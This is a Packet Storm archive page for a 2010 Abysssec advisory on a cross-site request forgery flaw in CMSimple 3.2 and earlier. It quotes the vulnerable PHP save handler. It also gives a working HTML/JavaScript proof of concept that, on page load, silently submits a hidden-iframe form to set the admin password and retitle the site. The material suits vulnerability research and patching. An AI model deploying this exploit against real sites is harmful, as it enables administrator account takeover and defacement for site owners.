what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Month Of Abysssec Undisclosed Bugs - CMSimple 3.2

Month Of Abysssec Undisclosed Bugs - CMSimple 3.2
Posted Sep 18, 2010
Authored by Abysssec | Site abysssec.com

Month Of Abysssec Undisclosed Bugs - CMSimple versions 3.2 and below suffer from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 222618d51aabdb031a7b98ec991aa0c5bd04539cebaa77f999e66cb8f96a26a7

Month Of Abysssec Undisclosed Bugs - CMSimple 3.2

Change Mirror Download
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/

http://www.exploit-db.com/moaub-18-cmsimple-xsrf-vulnerability/

'''


- Title : CMSimple XSRF Vulnerability
- Affected Version :CMSimple <=3.2
- Vendor Site : www.cmsimple.org

- Discovery : Abysssec


- Description :
===============
CMSimple is one of the smallest, smartest and most simple Content Management Systems under the GPL or AGPL licence.
This CMS supported Multi language.

- Vulnerability:
==================
XSRFs
--------
Several XSRF existed in this CMS, attacker can use them for: changing admin password ,change use type or ,Deface the website.

Here is vulnerable code:

file:cmsimple/adm.php[line 141-180]:
if ($action == 'save') {
if ($form == 'array') {
$text = "<?php\n";
foreach($GLOBALS[$a] as $k1 => $v1) {
if (is_array($v1)) {
foreach($v1 as $k2 => $v2) {
if (!is_array($v2)) {
initvar($k1.'_'.$k2);
$GLOBALS[$a][$k1][$k2] = $GLOBALS[$k1.'_'.$k2];
$GLOBALS[$a][$k1][$k2] = stsl($GLOBALS[$a][$k1][$k2]);
if ($k1.$k2 == 'editorbuttons')$text .= '$'.$a.'[\''.$k1.'\'][\''.$k2.'\']=\''.$GLOBALS[$a][$k1][$k2].'\';';
else $text .= '$'.$a.'[\''.$k1.'\'][\''.$k2.'\']="'.preg_replace("/\"/s", "", $GLOBALS[$a][$k1][$k2]).'";'."\n";
}
}
}
}
$text .= '?>';
}
else $text = rmnl(stsl($text));
if ($fh = @fopen($pth['file'][$file], "w")) {
fwrite($fh, $text);
fclose($fh);
if ($file == 'config' || $file == 'language') {
if (!@include($pth['file'][$file]))e('cntopen', $file, $pth['file'][$file]);
if ($file == 'config') {
$pth['folder']['template'] = $pth['folder']['templates'].$cf['site']['template'].'/';
$pth['file']['template'] = $pth['folder']['template'].'template.htm';
$pth['file']['stylesheet'] = $pth['folder']['template'].'stylesheet.css';
$pth['folder']['menubuttons'] = $pth['folder']['template'].'menu/';
$pth['folder']['templateimages'] = $pth['folder']['template'].'images/';
if (!(preg_match('/\/[A-z]{2}\/[^\/]*/', sv('PHP_SELF')))) {
$sl = $cf['language']['default'];
$pth['file']['language'] = $pth['folder']['language'].$sl.'.php';
if (!@include($pth['file']['language']))die('Language file '.$pth['file']['language'].' missing');
}
}
}
}
else e('cntwriteto', $file, $pth['file'][$file]);
}

+POC:
show this code as html page to CMS Admin:
<html>
<head>
<title>Change Password and Deface site.</title>
<script>
function creat_request (path,parameter,method) {
method = method || "post";
var remote_dive = document.createElement('div');
remote_dive.id = 'Div_id';
var style = 'border:0;width:0;height:0;';
remote_dive.innerHTML = "<iframe name='iframename' id='iframeid' style='"+style+"'></iframe>";
document.body.appendChild(remote_dive);
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);
form.setAttribute("target", "iframename");

for(var key in parameter) {
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", parameter[key]);
form.appendChild(hiddenField);
}
document.body.appendChild(form);
form.submit();
}
function bypass(){
creat_request('http://site.com/cmsimple/',{'security_password':'test1','security_type':'page','site_title':'ALERT.','site_template':'default','language_default':'en','meta_keywords':'CMSimple%2C+Content+Management+System%2C+php','meta_description':'CMSimple+is+a+simple+content+management+system+for+smart+maintainance+of+small+commercial+or+private+sites.+It+is+simple+-+small+-+smart%21','backup_numberoffiles':'5','images_maxsize':'150000','downloads_maxsize':'1000000','mailform_email':'','editor_height':'%28screen.availHeight%29-400','editor_external':'','menu_color':'000000','menu_highlightcolor':'808080','menu_levels':'3','menu_levelcatch':'10','menu_sdoc':'','menu_legal':'CMSimple+Legal+Notices','uri_seperator':'%3A','uri_length':'200','xhtml_endtags':'','xhtml_amp':'true','plugins_folder':'','functions_file':'functions.php','scripting_regexp':'%5C%23CMSimple+%28.*%3F%29%5C%23','form':'array','file':'config','action':'save'});
}

</script>
</head>
<body onload="bypass();" >
</body>
</html>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close